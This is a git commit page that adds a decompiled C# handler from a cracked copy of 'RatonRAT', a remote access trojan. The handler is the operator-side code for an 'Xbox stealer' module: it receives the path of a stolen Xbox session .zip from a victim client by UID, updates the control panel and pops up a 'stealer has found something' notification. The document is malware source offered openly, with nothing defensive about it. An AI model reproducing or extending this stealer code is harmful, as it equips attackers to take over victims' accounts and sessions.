initial commit
This commit is contained in:
@@ -0,0 +1,35 @@
|
||||
// Decompiled with JetBrains decompiler
|
||||
// Type: Server.Handlers.HandleXbox
|
||||
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
|
||||
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
|
||||
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
|
||||
|
||||
using Raton.Forms.ClientForms.Stealers;
|
||||
using Raton.Windows;
|
||||
using Server.Connection;
|
||||
using Stuff;
|
||||
using System;
|
||||
using System.Windows.Forms;
|
||||
|
||||
#nullable disable
|
||||
namespace Server.Handlers;
|
||||
|
||||
internal class HandleXbox
|
||||
{
|
||||
public HandleXbox(SillyClient client, Unpack rip2pac)
|
||||
{
|
||||
ratonXbox ratonTelegram = (ratonXbox) Application.OpenForms["Xbox | Client ID: " + rip2pac.GetAsString("UID")];
|
||||
if (ratonTelegram == null)
|
||||
return;
|
||||
if (ratonTelegram.SillyClient == null)
|
||||
ratonTelegram.SillyClient = client;
|
||||
ratonTelegram.Invoke((Delegate) (() =>
|
||||
{
|
||||
ratonTelegram.label1.Text = "Got the xbox session .zip!";
|
||||
ratonTelegram.label1.ForeColor = System.Drawing.Color.LightGreen;
|
||||
ratonTelegram.textBox1.Text = rip2pac.GetAsString("Path");
|
||||
ratonTelegram.button1.Enabled = true;
|
||||
Notification.Show($"RatonRAT • {rip2pac.GetAsString("UID")}\nXbox stealer has found something", "\uE946", new System.Windows.Media.Color?(System.Windows.Media.Color.FromArgb(byte.MaxValue, byte.MaxValue, (byte) 237, (byte) 41)));
|
||||
}));
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user